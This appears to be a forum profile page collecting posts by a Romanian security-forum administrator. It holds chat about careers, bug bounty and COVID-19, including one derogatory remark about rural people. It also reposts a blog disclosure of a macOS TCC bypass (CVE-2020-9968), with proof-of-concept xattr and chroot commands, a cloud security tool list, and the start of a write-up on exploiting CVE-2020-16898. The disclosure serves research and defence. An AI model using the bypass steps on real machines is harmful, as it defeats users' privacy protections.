Jump to content

Nytro

Administrators
  • Posts

    18724
  • Joined

  • Last visited

  • Days Won

    705

Everything posted by Nytro

  1. Da, e foarte important. Eu cand am fost la interviuri, persoanele care ma intervievau: 1. Stiau de mine de pe forum si prezentat la Defcamp 2. Persoana cu care am discutat mi-a zis ca ma urmarea pe Twitter (alte persoane de acolo stiau de asemenea de mine) 3. Ma stiau pentru ca am prezentat la OWASP si Defcon + Github (NetRipper) 4. Ma cunoscusem cu una dintre ele la o conferinta si stiau cate ceva despre prezentari/blog/RST/proiecte Conteaza mult. Trebuie sa demonstrezi ceea ce stii, degeaba treci in CV ca stii mii de lucruri daca nu le demonstrezi, ca si cum ai aplica pe o pozitie de web designer si ai zice ca ai facut sute de site-uri dar nu arati niciunul. PS: Cam la toate firmele la care am lucrat am participat la interviurile de angajare pentru pozitii noi. Activitatea pe forum, prezentari, tutoriale, tool-uri au reprezentat intotdeauna un punct in plus din partea mea. Daca va place domeniul, o sa faceti cate ceva. Cum ziceau suporterii dinamovisti intr-un mesaj: "Pasiunea > Ratiunea".
  2. Salut si bine ai venit! Partea de bug bounty nu mai merge atat de bine ca in trecut pentru ca sunt extrem de multe persoane care fac asta, din toata lumea. Si pe langa asta, multe dintre ele fac asta "non-stop" adica poate mai mult de 8 ore pe zi. Multi sunt idioti care raporteaza numai mizerii dar sunt si multi buni care fac o gramada de bani. Eu nu iti recomand asta pe post de "cariera" din simplul motiv ca nu e ceva stabil. Cel putin nu la inceput. E mai bine sa ai un job cu venit stabil si in timpul liber sa faci bug bounty. Apoi, daca treaba merge bine poti renunta la job sa faci bug bounty full time. Problema e ca te trezesti ca nu mai ai bani si ca... nu gasesti nimic si asa apare presiunea si stresul. Ah, da, desigur, pentru succes pe partea asta trebuie sa o faci pe programe private sau pe programe unde nu au mai sarit mii de oameni pe ele. Cat despre job, la fel ca la orice alt job, e mai greu la inceput. Si pe dev poate fi greu sa gasesti prima pozitie, nu te da batut si "arata ce poti" in CV. Fa bug bounty, fa proiecte, fa un research, scrie un tutorial, orice. O sa dea bine la CV. Multe firme cauta persoane cu experienta pentru ca au nevoie rapid de rezultate. Si la firma la care lucrez am avut nevoie la fel, de cineva senior, care sa vina, sa stea o saptamana si apoi poc, la treaba, singur, fara ajutor. Dar sunt si firme care nu au "graba" aceasta, trebuie doar sa ai rabdare si sa iesi in fata altor persoane, sa demonstrezi ceea ce stii direct din CV. PS: Sper ca in CV ai pus ceea ce ne-ai zis mai sus.
  3. Criza nu va disparea prea curand, nici la inceputul anului viitor inclusiv in cazul in care apare un vaccin bun. Nu exista statisticile astea pe care le vrei tu si nu vor exista vreodata. Pentru a avea totul ca la carte trebuie sa testezi toata populatia, sa vezi ce job au toti, cum au calatorit, cate persoane au intalnit, cu cate persoane au stat x minute de vorba si mai stiu eu ce. Eu nu stiu ce am facut saptamana trecuta... Ai aici statisticile disponibile: https://datelazi.ro/ Din 210.000 de persoane au murit 6400. Daca Romania are 21.000.000 populatia inseamna ca daca ne-am infecta toti romanii ar muri 640.000 de persoane. Sase sute patru zeci de mii. Bine, asta e doar teoretic, normal, ca sunt multi asimptomatici care nici nu stiu ca au fost infectati. Dar tot s-ar ajunge la un numar de 210.000 de decese (sa zicem). Adica 1%. Asta inseamna ca din cei 300 de "prieteni" de pe Facebook imi mor 3. Asta inseamna ca din 500 de useri activi de pe forum mor 5. Vi se pare putin? Mie nu. Nu cred ca de gripa mor atati romani. De fapt e clar asta. Si asta in conditiile in care sunt X masuri luate de care oamenii tot se plang. Ah, sper sa nu incepeti ca mor X persoane anual de cancer ca fac infarct...
  4. Exemplu de protocol bine pus la punct: https://signal.org/docs/ Sau cel folosit de catre Telegram: https://core.telegram.org/mtproto Discutie legata de o comparatie intre ele: https://crypto.stackexchange.com/questions/31418/signal-vs-telegram-in-terms-of-protocols
  5. Am purtat si eu masca sambata, continuu, 09:00 - 19:00 si nu am patit absolut nimic. Exemplul meu era o analogie, nu era o gluma. 1. Consecinta e ca nu te pisi pe celalalt, care e nevinovat 2. Aceti "cativa" sunt foarte multi si nu stiu ca se pisa pe ei. Si se mai si pisa des 3. Pentru ca nu au costume spatiale si nu e garantat ca nu se pot infecta. Un medic care s-a infectat a declarat ca doar si-a dat jos echipamentul in camera de dezechipare si de acolo a luat, dar se poate luat dintr-un milion de alte locuri, inclusiv de la spital (unde e spatiu inchis cu zeci de persoane confirmate pozitiv) si din afara spitalului (magazin, autobuz etc). Nu am vazut pe nimeni sa fie haituit sau speriat ca poarta o mizerie de hartie/textil la gura. Nu am vazut nici politie alergand dupa cineva iar eu nu am avut nicio problema cu absolut nimic de cand e criza asta si port masca. De fapt e bine, nu vede lumea cat de urat sunt. (Glumesc, sunt handsome) Edit: Eu consider ca multi oameni nu prea cred in acest virus si in grvitatea sa din cauza ca nu stiu ei personal persoane infectate. Mai lasati si voi laptop-urile si vorbiti cu oamenii. Eu stiu personal cel putin 10 persoane care au fost infectate, iar in weekend am mai aflat de vreo 4-5. Rude. Unele au avut simptome mai usoare altele... nu chiar.
  6. Super, detalii pentru aplicare sunt aici: https://rstcon.com/cfp/
  7. Legat de porcariile astea cu masca... Haideti sa facem un experiment. Se intalnesc doua persoane. Si se pisa una pe alta, la propriu. Una cu pantaloni pe ea, cealalta fara. Se se intampla? La fel se pun intrebarile: ce se intampla daca ambele persoane au pantaloni sau daca niciuna dintre ele nu are pantaloni? La fel si cu masca. Nu trebuie sa ai studii medicale sa intelegi ca daca porti ceva pe gura si vorbesti (de exemplu cu scuipat), tusesti, sau stranuti, orice ai avea pe fata te ajuta sa nu dai mai departe ce iti iese pe gura. Plm, parca ati crescut in copaci.
  8. Salut, care e rezultatul final? Adica ce vrei sa realizezi printr-o astfel de "operatiune"? Sa obtii acces la niste servere de 2 lei prin care sa dai (D)DoS la cine stie ce alt server de 2 lei? Au evoluat lucrurile. In general se mai gasesc parole slabe, dar nu cred ca la fel de comun ca in trecut. In plus, ca sa pici un server mai serios e nevoie de mai mult decat 5-6 porcarii de VPS-uri. Eu vreau sa cred ca nu se mai practica, ca putem mai mult. Cel putin, cei care fac asta, pun ransomware pe servere si "fac un ban". Cu DDOS-ul ala nu faci nimic. Dar nici asa, sistemele "interesante" nu au "admin:password"-ul de dictionar, deci munca in zadar. Ca mai scapa cate ceva din an in an, se mai intampla, dar daca ar fi mers asta ar fi fost stirile pline de astfel de lucruri. Fiti seriosi.
  9. Eu te cred daca imi dai un link pe web archive dintr-o data de dinainte de 2020. Nu ma intereseaza ce zice OMS sau oricine altcineva. Un document DIN DATA de 2017-2018-2019 ma poate convinge. Haideti sa va spun un secret, eu va zisesem din 2010 de Covid dar nimeni nu m-a crezut
  10. Arata-mi unul pe web archive (deoarece arata si data publicarii). Am cautat mai multe si toate sunt din septembrie 2020. https://web.archive.org/
  11. Testele RT-PCR nu sunt noi si se folosesc de mult timp. Se pot folosi printre altele pentru detectia ARN (Adica ADN cu o singura catena) al virusului Covid-19. https://en.wikipedia.org/wiki/Reverse_transcription_polymerase_chain_reaction Adica fake news. Cum zice cineva, probabil au fost redenumite produsele din cauza crizei de Covid. Adica SEO.
  12. Salut si bine ai venit! Ce ai facut si ce ai patit mai exact? Si ce este DIC? Sugestia mea pentru toti este ca la inceput sa invete bazele, adica sa stie cam ce sunt si cum functioneaza: sistemele de operare (Windows, Linux, Mac), retele (TCP/IP), protocoale (HTTP, DNS, FTP, SMTP etc.), putina programare in orice limbaj, ceva web (HTML, CSS, JavaScript), SQL, cryptografie etc. Apoi pot invata despre vulnerabilitati, cum sunt exploatate si asa mai departe. Cred ca bazele sunt necesare in orice job in IT, in special in domeniul security. PS: In functie de ce ai facut e posibil sa ai unele dificultati la angajare. Sugestia mea e sa fii sincer si sa le zici despre asta ca daca se afla altfel e mai nasol. A venit un baiat la un interviu acum ceva ani si a trebuit sa il refuzam desi tehnic nu era rau.
  13. Super, uitati aici vaccinul de 25 Hz:
  14. Da, cam asa fac toti. Probabil o sa fie si reduceri reale, dar foarte putine. E bine ca urmaresti evolutia preturilor, e singura metoda sigura sa nu iti iei teapa.
  15. Hai sa imbinam pariurile cu IT-ul. De ce nu faceti o automatizare care sa ia toate meciurile, rezultatele din ultimele x etape si faceti o mica statistica (numita si machine learning) prin care sa vedeti cam care ar fi sansele ca o echipa sa castige? Desigur, nu e ceva sigur dar ar putea ajuta. Nu neaparat de generat meciuri, dar de facut o lista de "ponturi" pe care sa le puteti folosi.
  16. Mai vad ocazional pe Facebook mesaje de la persoane (pe care le cunosc personal) care nu considera Covid-19 cine stie ce problema. Si mai posteaza cate o mizerie pe care o gasesc pe Facebook. Ce au in comun aceste persoane? Sunt de la tara. Ma duce cu gandul la lipsa de educatie si coeficient de inteligenta mai mic decat media (adica sunt niste prosti, dar am vrut sa ma exprim academic) dar si la faptul ca in mediul rural nu au fost atat de multe cazuri deoarece interactiunea e mai mica si cum ei "nu au vazut" cu ochii lor, nu cred. Pe de-o parte ii inteleg, sursele lor de informare nu sunt tocmai niste experti in domeniu, dar sunt sigur ca si daca l-ar asculta pe Florin Salam ar crede in virus (fratele sau a murit de Covid). O parte din mine vrea sa ii aduca pe calea cea buna, dar celalta parte imi zice ca Darwin are dreptate si ca problema se rezolva de la sine.
  17. We Need To Talk About MACL Posted on 2020-10-18 Tagged in low-level, macos If you've never heard of MACL on MacOS, you're not alone. This obscure feature is a hidden part of MacOS that underpins Apple's concept of User-Intent, a shift in focus for MacOS privacy controls in an attempt to stop endless prompts interrupting the user. And by now we all understand just how annoying these alerts can be to us attackers. Being able to operate on an endpoint without giving the game away is of course essential, and unfortunately staying under the radar on MacOS is getting tougher with each release. Even once we've compromised the endpoint and elevated to root, much of the data stored in files is unavailable, and one wrong step can lead to the dreaded: Now if you read this blog you'll see that I have previously looked at bypasses for Apple's privacy controls (also known as TCC) by loading dylib's into specific Apple applications containing entitlements. That being said, I always like to have one or two esoteric techniques available for when those tougher jobs come up. So in this post we're going to look at just how MacOS's User-Intent system works, expose its attack surface, and disclose a vulnerability (CVE-2020-9968) found while looking at ways to abuse the User-Intent functionality to bypass TCC. Just What Is User-Intent? During a recent conversation/hacking session with @rbmaslen we spent a bit of time looking at odd behaviour observed while tailoring a TCC bypass for a client. You may have seen this behaviour yourself, but if not, give this a go... Using Catalina, open an application such as Visual Studio Code, choose File→Open to display the usual dialog and select any file on your Desktop. After clicking Open you will notice 2 things, first you will not receive the usual "Visual Studio Code would like to access files in your Desktop folder" prompt... and even if you block access to the Desktop folder for Visual Studio Code using privacy settings, you're still going to retain access to the file. After a bit of Googling to understand what was going on, this video from 2019's WWDC conference explained a lot. The talk gives a brief mention of User-Intent vs User-Consent where we can see Apple trying to solve an issue which plagued Windows users during the rollout of UAC. Apple's solution with Catalina was to create a way of allowing a user to approve access to a file or directory without having to explicitly select an option via a dialog box every time. Now there are a few ways to see User-Intent in action: A user selecting a file via an Open or Save dialog. A user dragging a file from Finder onto another application window. A user double-clicking on a file in Finder. And of course this logic stacks up, after all, if a user selects a file explicitly in a dialog box, why would you ever need to prompt them again for consent? Now this is the point where an all consuming obsession to know why things work the way they do kicks in! It took me a few days to get my head around all the moving parts, but what I found was an impressive system which Apple have built to handle user privacy. Let's focus on the example of a user selecting a file via the Open dialog by crafting a small application. The full source code is available here, but for now we will focus on these 2 methods of selecting a file: // Uses the open() syscall to open a file handle - (IBAction)clickedOpenManual:(id)sender { NSString *val = [_openTextBox stringValue]; int fd = open([val cString], O_RDONLY); if (fd > 0) { [[self->_logTextBox documentView] insertText:@"Attempting to open file: Success\\n"]; } else { [[self->_logTextBox documentView] insertText:@"Attempting to open file: Failure\\n"]; } } // Uses the Open dialog to choose a target file - (IBAction)clickedOpen:(id)sender { NSOpenPanel* panel = [NSOpenPanel openPanel]; [panel setCanChooseDirectories:YES]; [panel beginWithCompletionHandler:^(NSInteger result){ if (result == NSModalResponseOK) { NSURL* theDoc = [[panel URLs] objectAtIndex:0]; [[self->_logTextBox documentView] insertText:[NSString stringWithFormat:@"Selected file: %@\\n", [theDoc path]]]; } }]; } This small example gives us 2 ways to handle a file, either by directly calling the open() syscall on a path, or allowing the user to select a file via the Open dialog box: If we start with the open syscall and attempt to open a file on our desktop, we are greeted with the familiar dialog: And if we select the "Don't Allow" option, we can see that of course our attempt to open the file fails. Next we launch the Open dialog and select the target file before selecting the Open option. Surprisingly this time everything works just fine, even though we have explicitly denied access: Further, if we restart the app and provide the path to the same file without selecting via the dialog this time, we see that the open method works fine: This is User-Intent in action, where MacOS is seeing that we have used the dialog to select a file which in turn gives our application permission to access its contents without forcing any further warnings. Now this is where things get interesting, let's take a look at any attributes applied to the file we selected using the command: xattr -l ~/Documents/supersecretz.txt What you will see is something like this: And here we are introduced to the com.apple.macl attribute, which is the magic behind this functionality. com.apple.macl The MACL attribute usually consists of a header value of 02 00 followed by a UUID corresponding to the application permitted to access the file. The UUID is unique for each system, user and application meaning that we can't preempt what this value will be in advance. I'm not too sure if this was implemented in this way due to privacy concerns (after all, this gives a nice artifact to see what files a user has accessed with an application) but in any case we know that if this MACL attribute has been added, the matching application and user can re-access the file without ever having to deal with privacy settings. To show this in action, let's take the MACL entry added to our test file above and apply this directly to another file such as ~/Desktop/secret.txt: xattr -wx com.apple.macl 020091877181CB4E4D7F8004D7BFF6B58C58000000000000000000000000 ~/Desktop/secret.txt As expected, we see that we can now open this file directly from our application without any need to bother with privacy settings: Now let's try and remove the MACL from the file using: xattr -d com.apple.macl ~/Desktop/secret.txt Somewhat unexpectedly, we see here is that the MACL instantly reappears. This means that by design, once a MACL has been added to a file, it is difficult to remove it. Any attempts to do so will also be greeted with this message shown in Console: How The Open Dialog Applies The MACL So what makes the Open dialog so special and just how does the it add a MACL to a file it should otherwise not have access to? Obviously our own applications can't just go around adding MACL's willy nilly as that would be a pretty large hole in MacOS privacy controls, so something else is surely at play here. Let's start with the AppKit.framework library which is actually responsible for the Open dialog. What we find is that the framework consists of not only the AppKit library, but also a number of supporting XPC Services: This is a common pattern used by Apple frameworks which allows entitlements to be assigned to a service which can then be requested using XPC from a library loaded into our process. The obvious XPC service which sticks out here is com.apple.appkit.xpc.openAndSavePanelService.xpc. When we look at its entitlements, we see this: Here we see a number of private entitlements, including the coveted kTCCServiceSystemPolicyAllFiles entitlement which grants access to all files in privacy protected locations without ever prompting the user. Now this makes sense, as MacOS requires the ability to actually access a file regardless of TCC settings before adding a MACL. So surely this is the place that now applies the MACL to our file? Well..... no. While this service provides the first step of exposing entitlements needed to access our target files without prompting the user, handling of the MACL attribute is actually done by within the kernel, specifically within the Sandbox.kext kernel extension, which means that we need to visit the kernel to understand what is going on. Kernel Sandbox Extensions As we go through the imported symbols from AppKit, we find references to a range of functions beginning with sandbox_extension_... These functions wrap calls to the sandbox_ms syscall by invoking the "Sandbox" module and invoking a so called "extension". In our case we are interested in methods exposed from libSystem.dylib beginning with sandbox_extension_issue_file... and sandbox_extension_consume. Let's begin by making a call to one of the methods, sandbox_extension_issue_file_to_self. This call takes 3 parameters: char* sandbox_extension_issue_file_to_self(const char *sandboxEnt, const char *filePath, int flags); Upon calling the function and providing the path to a file we have access to, we find that we are returned a string which looks like this: f6b75b461bada9c3b2e73400359bc8d5844b4a3d4442700fd352fe45bcfd650b;00;00030000;00001b03;003d0fe5;000000000000001a;com.apple.app-sandbox.read;01;01000005;00000000000d1bbf;1d;/users/xpn/documents What the hell is this monstrosity? Well to understand what we are seeing we will need to load our disassembler and jump into Sandbox.kext. The function we are interested in is _syscall_extension_issue which takes 2 arguments: _syscall_extension_issue(proc_t *proc, struct extension_issue_request *req); After some reversing, the second argument appears to be a struct similar to: struct extension_issue_request { const char *sandbox_string; // 0x00 int cmd; // 0x08 const char *filePath; // 0x10 int flags; // 0x18 char *returnedToken; // 0x20 int pid; // 0x28 int res; // 0x30 } If we spend a bit of time reversing the function, we can figure out the interesting parts of the token: f6b75b461bada9c3b2e73400359bc8d5844b4a3d4442700fd352fe45bcfd650b - HMAC-SHA256 of the token 00 - Sandbox extension cmd 00030000 - Flags 00001b03 - PID 003d0fe5 - PID Version 000000000000001a - Size of sandbox string com.apple.app-sandbox.read - Sandbox string 01 - Does file exist 01000005 - Filesystem ID 00000000000d1bbf - iNode ID 1d - Sandbox Storage Class /users/xpn/documents - Target file path Before we move on let's talk about that HMAC-SHA256 hash for a second. The key used for HMAC is actually generated on loading the sandbox.kext module, meaning that a token is invalidated on reboot. The key is set to 40 bytes of randomness stored within the _secret variable so bruteforcing is out of the question: So what can we do with this returned token? Well to understand how this is handled we need to look at another method, _syscall_extension_consume which takes 2 arguments: _syscall_extension_consume(proc_t *proc, struct extension_consume_request *req); Again by disassembling this function we find that the passed request likely looks like this: struct extension_consume_request { const char *token; int length; int *returnValue; }; So when our token is parsed, what checks are completed? Well first up is the validation of the HMAC-SHA256 hash: As a side note, if you are like me and was hoping for a timing attack on the HMAC hash to reveal the secret, Apple already considered this: Assuming that the HMAC-SHA256 hash matches, next the PID and PID Version are validated against our calling process to ensure that they match: If this is OK we next enter one of 4 paths depending on the Sandbox extension cmd value our token contains. For our purpose this will be 0x00 which takes us to a function of _macl_record with the following arguments: _macl_record(proc_t *proc, const char *filename, bool fileExists, int fsID, int iNode, int res); This function performs a number of checks on the passed parameters. First it identified if the inode exists on the filesystem ID passed: If this file exists, we add our MACL: Interestingly, if the file is found to not exist via the inode, a lookup is performed based on the Filename instead, and if the filename exists, the MACL is applied: And there we have it, the User-Intent framework from application to XPC driven dialog to kernel to MACL. Now... let's hunt for bugs! Abusing User-Intent To Bypass TCC So now that we understand how User-Intent works, are there any ways to abuse this to bypass TCC? After understanding the internals of this system, it took a few hours of looking but thankfully there is a situation where we can abuse a bug in this process. The easiest way that I could find to assign a MACL to a folder we don't have access to is via a chroot container. This does mean that we will need to have root or sudo privileges to pull this off as we will need permission to make the chroot call, but let's create a very simple container using something like: # Add libs and progs required by our POC mkdir -p /tmp/jail/usr/lib/; cp -r /usr/lib/* /tmp/jail/usr/lib/ mkdir /tmp/jail/bin; cp /bin/bash /tmp/jail/bin # Add our POC cp /tmp/poc /tmp/jail/ With our container built, let's enter the jail with: # Execute our chroot to grab a token sudo chroot /tmp/jail /bin/sh -c "mkdir -p /Users/xpn/Documents; /main issue /Users/xpn/Documents" Once executed, we get: TADA! We now have a token for the chroot path of /Users/xpn/Documents. Now if we attempt to consume this token: Hmm, unfortunately this doesn't work. Well that's because our inode value still exists, and remember from our earlier research that if the inode exists then it takes precedence over the filename... so let's adjust our command to remove that directory after our token is generated: sudo chroot /tmp/jail /bin/sh -c "mkdir -p /Users/xpn/Desktop; /main issue /Users/xpn/Desktop; rmdir /Users/xpn/Desktop" And this time if we consume our token, we will see that we have access to the Documents folder, bypassing TCC completely: This of course works for any folder protected by TCC Note: I'm not 100% sure why yet, but the rmdir needs to be executed from within the chroot. If you attempt to do something like rm /tmp/jail/Users/xpn/Desktop, applying the token will not result in access to the protected folder. I'd love to know why this is if anyone has any ideas? So this has hopefully given you an idea of why TCC sometimes appears to allow what is clearly blocked. It is also hopefully an insight into an apparently simple bug which actually took a bit of understanding of MacOS internals to discover. As of MacOS 10.15.6, iOS 14, WatchOS 7 and tvOS 14 this bug has now been fixed. Thanks to the Apple security team for making the disclosure process so quick and painless. Sursa: https://blog.xpnsec.com/we-need-to-talk-about-macl/
  18. Cloud Security Tools This page is a directory of open source cloud security tools I collected, organized by categories. If I've used a tool I usually publish my notes about it in its own page. Amazon Web Services Google Cloud Platform Azure Kubernetes, Docker, Terraform, Containers, Declarative Infrastructure If you know a tool that is not listed here let me know! TOOLS aardvark Aardvark is a multi-account AWS IAM Access Advisor API 🔗, aws iam actionhero Action Hero is a sidecar style utility to assist with creating least privilege IAM Policies for AWS. 🔗, aws iam Adaz 🔧 Automatically deploy customizable Active Directory labs in Azure 🔗, azure AirIAM Least privilege AWS IAM Terraformer 🔗, declarative-infra terraform aws iam aks-checklist The AKS Checklist 🔗, azure k8s amazon-s3-find-and-forget Amazon S3 Find and Forget is a solution to handle data erasure requests from data lakes stored on Amazon S3, for example, pursuant to the European General Data Protection Regulation (GDPR) 🔗, aws attack_range A tool that allows you to create vulnerable instrumented local or cloud environments to simulate attacks against and collect the data into Splunk 🔗, automated-cloud-advisor Automated Cloud Advisor is a extensible tool that aims at facilitating cost optimization in AWS, by collecting data for resources that are under utilized. In addition, this is a great learning tool for new DevOps/Cloud engineers that want to start automating things in AWS. 🔗, aws autovpn Create On Demand Disposable OpenVPN Endpoints on AWS. 🔗, aws aws-auto-remediate Open source application to instantly remediate common security issues through the use of AWS Config 🔗, aws aws-billing-slack-lambda Simple AWS Lambda powered Slack bot that reports your AWS Costs for the current month to a channel 🔗, aws aws-iam-authenticator A tool to use AWS IAM credentials to authenticate to a Kubernetes cluster 🔗, aws iam k8s aws-iamctl 🔗, aws iam aws-incident-response 🔗, aws incident-response aws-incident-response-runbooks 🔗, aws incident-response aws-lambda-api-call-recorder A recorder of AWS API calls for Lambda functions 🔗, aws aws-recon Multi-threaded AWS inventory collection tool with a focus on security-relevant resources and metadata. 🔗, aws aws-s3-virusscan Antivirus for Amazon S3 buckets 🔗, aws aws-sso-credential-process Bring AWS SSO-based credentials to the AWS SDKs until they have proper support 🔗, aws aws_exposable_resources Resource types that can be publicly exposed on AWS 🔗, aws aws_key_triage_tool Script to automate initial triage/enumeration on a set of aws keys in an input file. 🔗, aws capsule Kubernetes multi-tenant Operator 🔗, k8s cdkgoat CdkGoat is Bridgecrew's "Vulnerable by Design" AWS CDK repository. CdkGoat is a learning and training project that demonstrates how common configuration errors can find their way into production cloud environments. 🔗, aws cfngoat Cfngoat is Bridgecrew's "Vulnerable by Design" Cloudformation repository. Cfngoat is a learning and training project that demonstrates how common configuration errors can find their way into production cloud environments. 🔗, aws declarative-infra chart-testing CLI tool for linting and testing Helm charts 🔗, k8s cloudformation-guard A set of tools to check AWS CloudFormation templates for policy compliance using a simple, policy-as-code, declarative syntax 🔗, aws declarative-infra cloudkeeper Cloudkeeper - Housekeeping for Clouds 🔗, CloudShell Container Image for Azure Cloud Shell (https://azure.microsoft.com/en-us/features/cloud-shell/) 🔗, azure containers cloudsplaining Cloudsplaining is an AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized report. 🔗, aws iam cloudtracker CloudTracker helps you find over-privileged IAM users and roles by comparing CloudTrail logs with current IAM policies. 🔗, iam container-diff container-diff: Diff your Docker containers 🔗, docker containers container-scan A GitHub action to help you scan your docker image for vulnerabilities 🔗, docker containers CONVEX CONVEX is a group of CTFs that are independently deployable into participant Azure environments. 🔗, azure copilot-cli The AWS Copilot CLI is a tool for developers to build, release and operate production ready containerized applications on Amazon ECS and AWS Fargate. 🔗, aws containers dagda a tool to perform static analysis of known vulnerabilities, trojans, viruses, malware & other malicious threats in docker images/containers and to monitor the docker daemon and running docker containers for detecting anomalous activities 🔗, docker containers dast-operator Dynamic Application and API Security Testing 🔗, DefendTheFlag Get started fast with a built out lab, built from scratch via Azure Resource Manager (ARM) and Desired State Configuration (DSC), to test out Microsoft's security products. 🔗, azure detection-rules Rules for Elastic Security's detection engine 🔗, docker-slim DockerSlim (docker-slim): Don't change anything in your Docker container image and minify it by up to 30x (and for compiled languages even more) making it secure too! (free and open source) 🔗, docker containers dockerfile-security A collection of OPA rules to statically analyze Dockerfiles to improve security 🔗, declarative-infra docker containers dockle Container Image Linter for Security, Helping build the Best-Practice Docker Image, Easy to start 🔗, docker containers dostainer 🔗, Dragonfly Dragonfly is an intelligent P2P based image and file distribution system. 🔗, gatekeeper Gatekeeper - Policy Controller for Kubernetes 🔗, k8s gcp-iam-role-permissions Exports primitive and predefined GCP IAM Roles and their permissions 🔗, gcp iam gimme-aws-creds A CLI that utilizes Okta IdP via SAML to acquire temporary AWS credentials 🔗, aws gke-auditor 🔗, k8s gcp goldpinger Debugging tool for Kubernetes which tests and displays connectivity between nodes in the cluster. 🔗, k8s govuk-aws The GOV.UK repository for our Migration to AWS 🔗, aws grype A vulnerability scanner for container images and filesystems 🔗, containers helm-freeze Freeze your charts in the wished versions 🔗, k8s http-desync-guardian Analyze HTTP requests to minimize risks of HTTP Desync attacks (precursor for HTTP request smuggling/spli). 🔗, iam-policies-cli A CLI tool for building simple to complex IAM policies 🔗, iam infracost Cloud cost estimates for Terraform in your CLI and pull requests 💰📉 🔗, terraform declarative-infra k8s-audit-log-inspector 🔗, k8s k8s-diagrams A collection of kubernetes-related diagrams 🔗, k8s k8s-snapshots Automatic Volume Snapshots on Kubernetes. 🔗, k8s kconmon A Kubernetes node connectivity monitoring tool 🔗, k8s kconnect Kubernetes Connection Manager CLI 🔗, k8s kip Virtual-kubelet provider running pods in cloud instances 🔗, k8s konstraint A policy management tool for interacting with Gatekeeper 🔗, krane Kubernetes RBAC static Analysis & visualisation tool 🔗, k8s kube-fluentd-operator Auto-configuration of Fluentd daemon-set based on Kubernetes metadata 🔗, k8s kube-forensics 🔗, k8s kube-janitor Clean up (delete) Kubernetes resources after a configured TTL (time to live) 🔗, k8s kube-prometheus Use Prometheus to monitor Kubernetes and applications running on Kubernetes 🔗, k8s kubectl-fuzzy This tool uses fzf(1)-like fuzzy-finder to do partial or fuzzy search of Kubernetes resources. Instead of specifying full resource names to kubectl commands, you can choose them from an interactive list that you can filter by typing a few characters. 🔗, k8s kubectl-images 🕸 Show container images used in the cluster. 🔗, k8s containers kubefs Mount kubernetes metadata storage as a filesystem 🔗, k8s kubei Kubei is a flexible Kubernetes runtime scanner, scanning images of worker and Kubernetes nodes providing accurate vulnerabilities assessment, for more information checkout: 🔗, k8s kuberhealthy A Kubernetes operator for running synthetic checks as pods. Works great with Prometheus! 🔗, k8s kubernetes-examples Minimal self-contained examples of standard Kubernetes features and patterns in YAML 🔗, k8s kubernetes-goat Kubernetes Goat is "Vulnerable by Design" Kubernetes Cluster. 🔗, k8s litmus Litmus helps Kubernetes SREs and developers practice chaos engineering in a Kubernetes native way. Chaos experiments are published at the ChaosHub (https://hub.litmuschaos.io). Community notes is at https://hackmd.io/a4Zu_sH4TZGeih-xCimi3Q 🔗, k8s lsh Run interactive shell commands on AWS Lambda 🔗, aws opa-image-scanner Kubernetes Admission Controller for Image Scanning using OPA 🔗, k8s declarative-infra PowerZure PowerShell framework to assess Azure security 🔗, azure professional-services Common solutions and tools developed by Google Cloud's Professional Services team 🔗, gcp rego-policies Rego policies collection 🔗, regula Regula checks Terraform for AWS, Azure and GCP security and CIS compliance using Open Policy Agent/Rego 🔗, terraform azure gcp aws declarative-infra rode cloud native software supply chain ☁️🔗 🔗, secrets-store-csi-driver-provider-azure Azure Key Vault provider for Secret Store CSI driver allows you to get secret contents stored in Azure Key Vault instance and use the Secret Store CSI driver interface to mount them into Kubernetes pods. 🔗, azure k8s SFPolDevChk Salesforce Policy Deviation Checker 🔗, SimuLand Cloud Templates and scripts to deploy mordor environments 🔗, sinker A tool to sync images from one container registry to another 🔗, containers SkyArk SkyArk helps to discover, assess and secure the most privileged entities in Azure and AWS 🔗, azure aws spacesiren A honey token manager and alert system for AWS. 🔗, aws starboard Kubernetes-native security tool kit 🔗, k8s starboard-octant-plugin Octant plugin for viewing Starboard security information 🔗, stash 🛅 Backup your Kubernetes Stateful Applications 🔗, k8s Stormspotter Azure Red Team tool for graphing Azure and Azure Active Directory objects 🔗, azure syft CLI tool and library for generating a Software Bill of Materials from container images and filesystems 🔗, containers synator Synator Kubernetes Secret and ConfigMap synchronizer 🔗, k8s talisman By hooking into the pre-push hook provided by Git, Talisman validates the outgoing changeset for things that look suspicious - such as authorization tokens and private keys. 🔗, terragoat TerraGoat is Bridgecrew's "Vulnerable by Design" Terraform repository. TerraGoat is a learning and training project that demonstrates how common configuration errors can find their way into production cloud environments. 🔗, terraform declarative-infra trailscraper A command-line tool to get valuable information out of AWS CloudTrail 🔗, aws tunshell Remote shell into ephemeral environments 🐚 🦀 🔗, vector High-performance, vendor-neutral observability pipelines. 🔗, version-checker Kubernetes utility for exposing image versions in use, compared to latest available upstream, as metrics. 🔗, k8s whalescan Whalescan is a vulnerability scanner for Windows containers, which performs several benchmark checks, as well as checking for CVEs/vulnerable packages on the container 🔗, containers whispers Identify hardcoded secrets and dangerous behaviours Sursa: https://cloudberry.engineering/tool/
      • 3
      • Thanks
      • Upvote
  19. 16 Oct CVE-2020-16898 – Exploiting “Bad Neighbor” vulnerability by pi3 Introduction During the last Patch Tuesday (13th of October 2020), Microsoft fixed a very interesting (and sexy) vulnerability: CVE-2020-16898 – Windows TCP/IP Remote Code Execution Vulnerability (link). Microsoft’s description of the vulnerability: “A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain the ability to execute code on the target server or client. To exploit this vulnerability, an attacker would have to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer. The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement packets.” This vulnerability is so important that I’ve decided to write a Proof-of-Concept for it. During my work there weren’t any public exploits for it. I’ve spent a significant amount of time analyzing all the necessary caveats needed for triggering the bug. Even now, available information doesn’t provide sufficient details for triggering the bug. That’s why I’ve decided to summarize my experience. First, short summary: This bug can ONLY be exploited when source address is link-local IPv6. This requirement is limiting the potential targets! The entire payload must be a valid IPv6 packet. If you screw-up headers too much, your packet will be rejected before triggering the bug During the process of validating the size of the packet, all defined “length” in Optional headers must match the packet size This vulnerability allows to smuggle an extra “header”. This header is not validated and includes “Length” field. After triggering the bug, this field will be inspected against the packet size anyway. Windows NDIS API, which can trigger the bug, has a very annoying optimization (from the exploitation perspective). To be able to bypass it, you need to use fragmentation! Otherwise, you can trigger the bug, but it won’t result in memory corruption! Collecting information about the vulnerability At first, I wanted to learn more about the bug. The only 